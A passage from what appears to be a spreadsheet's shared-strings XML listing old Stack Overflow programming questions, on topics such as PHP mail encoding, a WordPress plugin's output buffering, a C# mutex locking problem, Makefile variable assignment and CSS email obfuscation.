&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Mail Encodes Subject Line</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try to send a HTML encoded email from PHP, if the subject line contains special chars like &lt;code&gt;"Here's the information you requested"&lt;/code&gt;, PHP encodes it to read &lt;code&gt;"Here&amp;amp;#039;s the information you requested."&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;How do I fix this?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Here's what the code looks like using PHP mail():&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'To: ' . $mod_params['name'] . '&amp;lt;' . $mod_params['email'] . '&amp;gt;' . "\r\n";
$headers .= 'From: &amp;lt;do_not_reply@a4isp.com&amp;gt;' . "\r\n";  
$email_to = $mod_params['email'];
$email_sub = "Here's the Information You Requested";
$body = html_entity_decode("&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;" . $email_html_body . "&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;");
mail($email_to,$email_sub,$body,$headers);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It gives the same error as running it through the SugarPHPMailer class.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>decrypting pdf protected by aes-256bit using the right password</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to decrypting a pdf protected by an aes-256 bit key?&lt;/p&gt;
&lt;p&gt;I have the correct password and I need a command-line tool (or library - perhaps in python :P ) for decrypting the file and then doing some operation over it.&lt;/p&gt;
&lt;p&gt;The best thing could be if the file could be saved decrypted, then I elaborate it and then I can remove it...&lt;/p&gt;
&lt;p&gt;Does anyone know something about it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP best design practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, have a bunch of questions that I have been thinking about the past few days. Currently I have a site that is just a bunch of PHP files with MySQL statements mixed in with PHP, HTML and CSS, basically a huge mess. I have been tasked with cleaning up the site and have made for myself, the following requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The site needs to be efficient and well laid out (the source code), I would like to be able to write as little code as possible.&lt;/li&gt;
&lt;li&gt;There has to be good separation between structure, presentation and logic.&lt;/li&gt;
&lt;li&gt;For whatever reason, I can't use a framework and need to keep the code maintainable and "simple" as there will be future developers working with it.&lt;/li&gt;
&lt;li&gt;There needs to be an admin section for at least a few pages.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Saying that, this is what I know about the site as it is now:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Consists of 10-12 pages, a few are completely static, most are dynamically driven via a database and there is a huge form for users to fill out (20-30 fields) that need to be validated and checked.&lt;/li&gt;
&lt;li&gt;The hierarchy of the site is basically 5-6 main pages and then sub-pages within those.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, knowing those things I wanted to know if anyone had any tips/suggestions as to how to go about doing this with the least amount of headaches. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Would an OO approach be best in this situation?&lt;/li&gt;
&lt;li&gt;Since there are many static pages and the dynamic pages just need the content filled in would it be best to use some kind of basic template?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Thanks for the answers, when I said no frameworks I basically meant anything that would require new syntax other than PHP, as whoever gets hired to work on this site after me will probably only know PHP.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Posting contents of a file using HttpClient?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to send the contents of a file as part of a http request using Apache HttpClient and I could not figure out how to pass on the file contents in the request body.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check the exit code in Test::More?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;According to Test::More &lt;a href="http://search.cpan.org/~mschwern/Test-Simple-0.86/lib/Test/More.pm#EXIT_CODES" rel="nofollow"&gt;documentation&lt;/a&gt;, it will exit with certain exit codes depending on the out come of your tests.
My question is, how do I check these exit codes?&lt;/p&gt;
&lt;p&gt;ps. I am trying to build a harness myself. Is there a simple harness I can use?&lt;/p&gt;
&lt;p&gt;ps2. Test::Harness did the trick for me. In particular execute_tests function. This function returns all the statistics I want. Thank you everyone who gave useful links.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debug multiple copies of a program from one VS instance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a pre-alpha GUI program that I'm &lt;a href="http://en.wikipedia.org/wiki/Eat_one%27s_own_dog_food"&gt;dogfooding&lt;/a&gt; and want to run under the debugger (for when things go wrong &lt;code&gt;;)&lt;/code&gt; but I don't want to have to launch a new copy of VS for each instance of the App. Can this be done?&lt;/p&gt;
&lt;p&gt;I don't expect to actually be debugging more than one instance at a time, but still want the debugger in the look for all of them. Also I'm starting the app a few dozen time a day so it would have to be easy to do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a log4j equivalent for VBScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to instrument a series of .wsf and .vbs files with debug statements; before I go off and roll my own, does something like log4j exist for WSF/VBScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Filtering models with ReferenceProperties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using google app engine, and am having trouble writing querys to filter ReferenceProperties.&lt;/p&gt;
&lt;p&gt;eg.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Group(db.Model):
    name = db.StringProperty(required=True)
    creator = db.ReferenceProperty(User)
class GroupMember(db.Model):
    group = db.ReferenceProperty(Group)
    user = db.ReferenceProperty(User)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I have tried writing something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;members = models.GroupMember.all().filter('group.name =', group_name)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and various other things that don't work. Hopefully someone can give me a prod in the right direction...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Get a List of Assemblies in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get a list of assemblies in a directory. Is there another way than this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.IO.Directory.GetFiles(directory, "*.dll")
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Represent a query string in JSON</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this Javascript data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[{id:123,type:"test"},{id:154,type:"another"}]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would you transform that into something so that I can pass it as a HTTP post request?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;menu[0][id] = 123
menu[0][type] = test
menu[1][id] = 154
menu[1][type] = another
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I dont want to pass the actual JSON data, I want to clean it up and pass it as formatted HTTP paramaters.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Was able to parse the object on the client side using something like this, maybe you guys would suggest something better before I sign this as "answered"?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.serialize = function(elem) {
    var childs = elem.childElements();
    var str = "";
    for(var i=0, item; i&amp;lt;childs.length; i++) {
        item = childs[i];
        str += ((i)?"&amp;amp;":"")+"menu[" + i +"][id]=" + item.id.replace(/item_/,"");
        str += "&amp;amp;menu[" + i +"][type]=" + item.className;
        str += "&amp;amp;menu[" + i +"][section]=" + elem.id;
        str += "&amp;amp;menu[" + i +"][position]=" + i;
    }
    return str;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Good asp.net documentation tool?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know of a good asp.net website documentation tool?  There are a ton of them out there for classes, assembly's, dependencies, etc... but seemingly nothing decent for interface and control documentation&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP .NET and IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Most of the developers i work with test their web apps by running them from visual studio, and use the built in web server of VS to display the pages. My question is when these apps are deployed to a IIS server would they behave any differently?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I append a newline character for all lines except the last one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm iterating through a HashMap (see &lt;a href="http://stackoverflow.com/questions/448122/how-do-i-use-a-foreach-loop-in-java-to-loop-through-the-values-in-a-hashmap"&gt;my earlier question&lt;/a&gt; for more detail) and building a string consisting of the data contained in the Map.  For each item, I will have a new line, but for the very last item, I don't want the new line.  How can I achieve this? I was thinking I could so some kind of check to see if the entry is the last one or not, but I'm not sure how to actually do that.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any good examples on how to use Haskell monad functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Haskell monad functions are not easy to understand, where can I find usage examples?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Valid binding root for VSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to fix up my Visual Source Safe bindings for a project I have and when I select the location I believe a project should be bound to, i get a dialog that says:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;
The folder you chose is not a valid binding root for the projects you have selected. You attempted to retarget a solution to a source control folder that is not within the solution's root. In the change source control dialog box, specify the root for the solution. Select the folder 5 levels higher in the tree to chagne the source control bindings correctly.
&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;What on earth does that mean? There are no folders 5 levels higher.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic Exception over webservices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am integrating with MS Dynamics GP WebServices from C# and I am not sure how to handle exception.&lt;/p&gt;
&lt;p&gt;If I do a GetCustomer with a inexistant ID, the web services return me a "generic" SoapException and the message is "Business object not found." So the only way I see to be sure it's an invalid ID and not any other error, is by parsing the error message, I find this solution extremely fragile. My GP version is English, on customer site it's gonna be french and I have no idea in which language web services message gonna be. I am thinking about catching it, parsing the message and throw a more meaningful error type.  &lt;/p&gt;
&lt;p&gt;Do you see a better option ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wordpress Category ID vs Eval Issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok this is a little complex. I am creating a plugin, and want to find the category ID from the Post page.&lt;/p&gt;
&lt;p&gt;That's the easy part.&lt;/p&gt;
&lt;p&gt;What makes it complex is I am doing it within an ob_start (started in a 'template_redirect' action) as I want to edit the full page before it is returned to the browser. Again that is easy enough from the ob_start function.&lt;/p&gt;
&lt;p&gt;With the ID returned I want to evaluate some php stored in a sql field. I am trying to do this from within the ob_start function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$tui_cifp_insertvalue = tui_cifp_evaluate_html($tui_cifp_insertvalue);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This calls this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function tui_cifp_evaluate_html($string) {
return preg_replace_callback("/(&amp;lt;\?php|&amp;lt;\?|&amp;lt; \?php)(.*?)\?&amp;gt;/si",'EvalBuffer', $string);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which in turn calls&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function EvalBuffer($string) {
ob_start();
eval("$string[2];");
$ret = ob_get_contents();
ob_end_clean();
return $ret;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the php I am trying to evaluate is.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php tui_findPostThumbIMG([categoryID],100,100,'categoryintro-thumbnail','','',''); ?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This all works outside the ob_start routine, but here even simple php doesn't work. From within the ob_start routine the plugin breaks and a blank page returns.&lt;/p&gt;
&lt;p&gt;So I thought I could evaluate the php before the start of the ob_start and pass the result through a global variable. That works, but at the point this starts using the following, the category ID is not available.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( strpos($_SERVER['REQUEST_URI'], 'wp-admin') === false ) {
global $holdvalue;
$tui_cifp_insertvalue = get_option('tui_cifp_insertvalue');
$categories = get_the_category();
$categoryID = $categories[0]-&amp;gt;cat_ID;
$tui_cifp_insertvalue = str_replace("[categoryID]", $categoryID, $tui_cifp_insertvalue);
$holdvalue = tui_cifp_evaluate_html($tui_cifp_insertvalue);
add_action('template_redirect','tui_cifp_ob_start'); //
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The ob_start function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function tui_cifp_ob_start()
{
ob_start('tui_cifp_templatefilter');
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Ok I am stumped ... any ideas?&lt;/p&gt;
&lt;p&gt;I either need to find a hook that executes at the right time so that I have access to the category ID, or I need to work out how to evaluate the php during the ob_start.&lt;/p&gt;
&lt;p&gt;Oh ... I guess I should say. What I want to do is replace a tag on a wordpress page with some other information saved in a string, but need to be able to do this once the full page if drawn.&lt;/p&gt;
&lt;p&gt;Thanks
Stephen&lt;/p&gt;
&lt;p&gt;PS I have asked this on the wordpress forums without a response. Sorry for the cross posting but I am a little desperate. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Handle Cancelled Recurring Payments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Paypal to handle automated recurring payments for my website.  Users pay to subscribe to my website so they can get periodic newsletters.&lt;/p&gt;
&lt;p&gt;So let's say a customer cancels their membership a few months later.  They do this by logging into Paypal and cancels future automated payments.  How should I update my website to reflect this cancellation?&lt;/p&gt;
&lt;p&gt;The first solution I'm thinking of is to schedule a cronjob that executes a script every midnight to update my database with information from Paypal.&lt;/p&gt;
&lt;p&gt;The second solution is on newsletter mailout day, I execute a script to update my database with information from Paypal.  The website will also execute the script every time a user "logs in" to my website.&lt;/p&gt;
&lt;p&gt;Are there better ways to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - Locking issues with Mutex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a web application that controls which web applications get served traffic from our load balancer. The web application runs on each individual server.&lt;/p&gt;
&lt;p&gt;It keeps track of the "in or out" state for each application in an object in the ASP.NET application state, and the object is serialized to a file on the disk whenever the state is changed. The state is deserialized from the file when the web application starts.&lt;/p&gt;
&lt;p&gt;While the site itself only gets a couple requests a second tops, and the file it rarely accessed, I've found that it was extremely easy for some reason to get collisions while attempting to read from or write to the file. This mechanism needs to be extremely reliable, because we have an automated system that regularly does rolling deployments to the server.&lt;/p&gt;
&lt;p&gt;Before anyone makes any comments questioning the prudence of any of the above, allow me to simply say that explaining the reasoning behind it would make this post much longer than it already is, so I'd like to avoid moving mountains.&lt;/p&gt;
&lt;p&gt;That said, the code that I use to control access to the file looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    internal static Mutex _lock = null;
    /// &amp;lt;summary&amp;gt;Executes the specified &amp;lt;see cref="Func{FileStream, Object}" /&amp;gt; delegate on the filesystem copy of the &amp;lt;see cref="ServerState" /&amp;gt;.
    /// The work done on the file is wrapped in a lock statement to ensure there are no locking collisions caused by attempting to save and load
    /// the file simultaneously from separate requests.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;param name="action"&amp;gt;The logic to be executed on the &amp;lt;see cref="ServerState" /&amp;gt; file.&amp;lt;/param&amp;gt;
    /// &amp;lt;returns&amp;gt;An object containing any result data returned by &amp;lt;param name="func" /&amp;gt;.&amp;lt;/returns&amp;gt;
    private static Boolean InvokeOnFile(Func&amp;lt;FileStream, Object&amp;gt; func, out Object result)
    {
        var l = new Logger();
        if (ServerState._lock.WaitOne(1500, false))
        {
            l.LogInformation("Got lock to read/write file-based server state.", (Int32)VipEvent.GotStateLock);
            var fileStream = File.Open(ServerState.PATH, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.None);                
            result = func.Invoke(fileStream);                
            fileStream.Close();
            fileStream.Dispose();
            fileStream = null;
            ServerState._lock.ReleaseMutex();
            l.LogInformation("Released state file lock.", (Int32)VipEvent.ReleasedStateLock);
            return true;
        }
        else
        {
            l.LogWarning("Could not get a lock to access the file-based server state.", (Int32)VipEvent.CouldNotGetStateLock);
            result = null;
            return false;
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This &lt;em&gt;usually&lt;/em&gt; works, but occasionally I cannot get access to the mutex (I see the "Could not get a lock" event in the log). I cannot reproduce this locally - it only happens on my production servers (Win Server 2k3/IIS 6). If I remove the timeout, the application hangs indefinitely (race condition??), including on subsequent requests.&lt;/p&gt;
&lt;p&gt;When I do get the errors, looking at the event log tells me that the mutex lock was achieved and released by the previous request &lt;em&gt;before&lt;/em&gt; the error was logged.&lt;/p&gt;
&lt;p&gt;The mutex is instantiated in the Application_Start event. I get the same results when it is instantiated statically in the declaration.&lt;/p&gt;
&lt;p&gt;Excuses, excuses: threading/locking is not my fortÃ©, as I generally don't have to worry about it.&lt;/p&gt;
&lt;p&gt;Any suggestions as to why it randomly would fail to get a signal?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've added proper error handling (how embarrassing!), but I am still getting the same errors - and for the record, unhandled exceptions were never the problem.&lt;/p&gt;
&lt;p&gt;Only one process would ever be accessing the file - I don't use a web garden for this application's web pool, and no other applications use the file. The only exception I can think of would be when the app pool recycles, and the old WP is still open when the new one is created - but I can tell from watching the task manager that the issue occurs while there is only one worker process.&lt;/p&gt;
&lt;p&gt;@mmr: How is using Monitor any different from using a Mutex? Based on the MSDN documentation, it looks like it is effectively doing the same thing - if and I can't get the lock with my Mutex, it &lt;em&gt;does&lt;/em&gt; fail gracefully by just returning false.&lt;/p&gt;
&lt;p&gt;Another thing to note: The issues I'm having seem to be completely random - if it fails on one request, it might work fine on the next. There doesn't seem to be a pattern, either (certainly no every other, at least).&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update 2:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This lock is not used for any other call. The only time _lock is referenced outside the InvokeOnFile method is when it is instantiated.&lt;/p&gt;
&lt;p&gt;The Func that is invoked is either reading from the file and deserializing into an object, or serializing an object and writing it to the file. Neither operation is done on a separate thread.&lt;/p&gt;
&lt;p&gt;ServerState.PATH is a static readonly field, which I don't expect would cause any concurrency problems.&lt;/p&gt;
&lt;p&gt;I'd also like to re-iterate my earlier point that I cannot reproduce this locally (in Cassini).
&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lessons learned:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use proper error handling (duh!)&lt;/li&gt;
&lt;li&gt;Use the right tool for the job (and have a basic understanding of what/how that tool does). As sambo points out, using a Mutex apparently has a lot of overhead, which was causing issues in my application, whereas Monitor is designed specifically for .NET.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Interpreting assembly code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any assembly interpreters out there?&lt;/p&gt;
&lt;p&gt;What I'm looking for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have some assembly firmware code I want to run, but not on the actual hardware. &lt;/li&gt;
&lt;li&gt;I would like to run the code and see what it is doing. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, is there some sort of free and easy to use assembly simulator out there? &lt;/p&gt;
&lt;p&gt;Any other pointers you can think of? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Keep indentation of wrapped lines in Visual Studio 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Visual Studio 2008, is there a way to keep the indentation of automatically wrapped long lines? (Only need it for C#.)&lt;/p&gt;
&lt;p&gt;When word wrap is turned on, it looks like this:&lt;/p&gt;
&lt;pre&gt;
        var a = SomeFunctionOrWhateverWithSuperLongName(parameter1,
parameter2);
&lt;/pre&gt;
&lt;p&gt;I want it to look like this:&lt;/p&gt;
&lt;pre&gt;
        var a = SomeFunctionOrWhateverWithSuperLongName(parameter1,
        parameter2);
&lt;/pre&gt;
&lt;p&gt;I know some text editor can do this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Highlighting search terms in an MS Word document</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a project where we need to provide search over a collection of Word documents through a web-based interface. The client would like for the search terms to be highlighted when a user opens a document.&lt;/p&gt;
&lt;p&gt;Is there a way to do this directly in Word when opening a document? The only alternative we can come up with is to convert the Word documents to HTML and display that.&lt;/p&gt;
&lt;p&gt;Just for background, we're currently using Windows SharePoint Services for document searching.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Linq for ObjectDataSource: How to transform datetime using ToShortTimeString?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am accessing a business class using an ObjectDataSource and trying to produce output that makes sense to the user.  The return values describe a Class (as in Classroom and teaching, not software).  I would like to show the time of the class as a range like this: "9:00 AM - 10:00 AM".&lt;/p&gt;
&lt;p&gt;This is the Linq Query I am using to pull the data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return classQuery.Select(p =&amp;gt; new SelectClassData
                              {
                                   ClassID = p.ClassID,
                                   Title = p.Title,
                                   StartDate = p.StartDate.ToShortDateString(),
                                   EndDate = p.EndDate.ToShortDateString(),
                                   TimeOfClass =
                                   p.StartDate.ToShortTimeString() + " - " +
                                                       p.EndDate.ToShortTimeString()
                               }).ToList();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, I encode the start and ending times in the starting and ending dates even though these could potentially be on different dates.&lt;/p&gt;
&lt;p&gt;When I execute this code I get:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;"Could not translate expression 'p.EndDate.ToShortTimeString()' into SQL and could not treat it as a local expression."&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I know that I am projecting the results but, being new to Linq, I had assumed that the C# call to ToShortTimeString happened after the projection.  Can anyone help me figure out how to get the string I'm looking for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Makefile variable assignment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anybody give a clear explanation of how variable assignment really works in Makefiles. &lt;/p&gt;
&lt;p&gt;What is the difference between :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; VARIABLE = value
 VARIABLE ?= value
 VARIABLE := value
 VARIABLE += value
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have read the &lt;a href="http://www.gnu.org/software/make/manual/make.html#Reading-Makefiles"&gt;section&lt;/a&gt; in GNU Make's manual, but it still doesn't make sense to me. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Winform Checklistbox Headers/Columns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to implement a new column with a header in a checklistbox in vb.net?  I've done a bit of searching, but didn't find much on the topic.  Should I just abandon the quest and use a listview or some other control?&lt;/p&gt;
&lt;p&gt;Thanks for any/all help!
JFV&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should a list be represented in XML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In XML, how should a list be represented?&lt;/p&gt;
&lt;p&gt;With an enclosing list entity:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;person&amp;gt;
    &amp;lt;firstname&amp;gt;Joe&amp;lt;/firstname&amp;gt;
    &amp;lt;lastname&amp;gt;Bloggs&amp;lt;/lastname&amp;gt;
    &amp;lt;children&amp;gt;
        &amp;lt;child .../&amp;gt;
        &amp;lt;child .../&amp;gt;
        &amp;lt;child .../&amp;gt;
        &amp;lt;child .../&amp;gt;
        &amp;lt;child .../&amp;gt;
    &amp;lt;/children&amp;gt;
&amp;lt;/person&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or without:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;person&amp;gt;
    &amp;lt;firstname&amp;gt;Joe&amp;lt;/firstname&amp;gt;
    &amp;lt;lastname&amp;gt;Bloggs&amp;lt;/lastname&amp;gt;
    &amp;lt;child .../&amp;gt;
    &amp;lt;child .../&amp;gt;
    &amp;lt;child .../&amp;gt;
    &amp;lt;child .../&amp;gt;
    &amp;lt;child .../&amp;gt;
&amp;lt;/person&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Reference generated primary key in SQL script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a bunch of entries in a database with a single script and the problem I'm encountering is how to reference the generated primary key of the previous entry I created.&lt;/p&gt;
&lt;p&gt;For example if I created a customer, then tried to create an order for that customer, how do I get the primary key generated for the customer?&lt;/p&gt;
&lt;p&gt;I'm using SQLServer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I project lines dynamically on to 3D terrain?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a game in XNA for Xbox 360.  The game has 3D terrain with a collection of static objects that are connected by a graph of links.  I want to draw the links connecting the objects as lines projected on to the terrain.  I also want to be able to change the colors etc. of links as players move their selection around, though I don't need the links to move.  However, I'm running into issues making this work correctly and efficiently.&lt;/p&gt;
&lt;p&gt;Some ideas I've had are:&lt;/p&gt;
&lt;p&gt;1) Render quads to a separate render target, and use the texture as an overlay on top of the terrain. I currently have this working, generating the texture only for the area currently visible to the camera to minimize aliasing.  However, I'm still getting aliasing issues -- the lines look jaggy, and the game chugs frequently &lt;strike&gt;when moving the camera&lt;/strike&gt; EDIT: it chugs all the time, I just don't have a frame rate counter on Xbox so I only notice it when things move.&lt;/p&gt;
&lt;p&gt;2) Bake the lines into a texture ahead of time.  This could increase performance, but makes the aliasing issue worse.  Also, it doesn't let me dynamically change the properties of the lines without much munging.&lt;/p&gt;
&lt;p&gt;3) Make geometry that matches the shape of the terrain by tessellating the line-quads over the terrain.  This option seems like it could help, but I'm unsure if I should spend time trying it out if there's an easier way.&lt;/p&gt;
&lt;p&gt;Is there some magical way to do this that I haven't thought of? Is one of these paths the best when done correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it "better" to have an update field or COUNT query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a Django App I'm working on I've got this going on:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Parent(models.Model):
    name = models.CharField(...)
    def num_children(self):
        return Children.objects.filter(parent=self).count()
    def avg_child_rating(self):
        return Child.objects.filter(parent=self).aggregate(Avg('rating'))
class Child(models.Model):
    name = models.CharField(...)
    parent = models.ForeignKey(Parent)
    rating = models.IntegerField(default=0)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I plan on accessing &lt;strong&gt;avg_child_rating&lt;/strong&gt;  often.  Would it be &lt;em&gt;optimizing&lt;/em&gt; if I did the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Parent(models.Model):
    ...
    num_children = models.IntegerField(default=0)
    avg_child_rating = models.FloatField(default=0.0)
def update_parent_child_stats(sender, instance, **kwargs):
    num_children = Child.objects.filter(parent=instance.parent)
    if instance.parent.num_children != num_children:
        instance.parent.num_children = num_children
        instance.parent.avg_child_rating = Child.objects.filter(instance.parent=self).aggregate(Avg('rating'))
post_save.connect(update_parent_child_stats, sender=Child)
post_delete.connect(update_parent_child_stats, sender=Child)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The difference now is that every time a child is created/rated/deleted, the Parent object is updated.  I know that the created/rating will be done often.&lt;/p&gt;
&lt;p&gt;What's more &lt;em&gt;expensive&lt;/em&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to programmatically set every other column in a worksheet in Interop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Excel Interop (.NET) how can we set programmatically two different Excel formulas for every other column. For instance, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Range r = _sheet.get_Range(_sheet.Cells[1, 1], _sheet.Cells[I, J])  
r.Formula = "=something1"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will do it for every cell.  &lt;/p&gt;
&lt;p&gt;But within &lt;code&gt;J&lt;/code&gt; columns every other column has to have formula &lt;code&gt;=something2&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;The size of the range is known only at run-time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS Copy and paste problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've developed a system in my application where emails are picked up with a regex, and then reversed in the source (to thwart bots). I then add the span class 'obfuscate email'. I then use CSS to reverse the the text back to be displayed and Javascript make sure that &lt;code&gt;mailto:&lt;/code&gt; links still work.&lt;/p&gt;
&lt;p&gt;I was pretty happy with my solution until I realised that copying and pasting the email puts it in the clipboard backwards. I was wondering if there was any way I could remedy this? I've been testing in Firefox 3 for OS X.&lt;/p&gt;
&lt;p&gt;The page in question is available here: &lt;a href="http://www.leaklocations.com.au/contact-us/" rel="nofollow"&gt;http://www.leaklocations.com.au/contact-us/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;To see the problem, simply copy and paste the email on that site. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Most Efficient way to access schema with ODBC and OleDB</t>
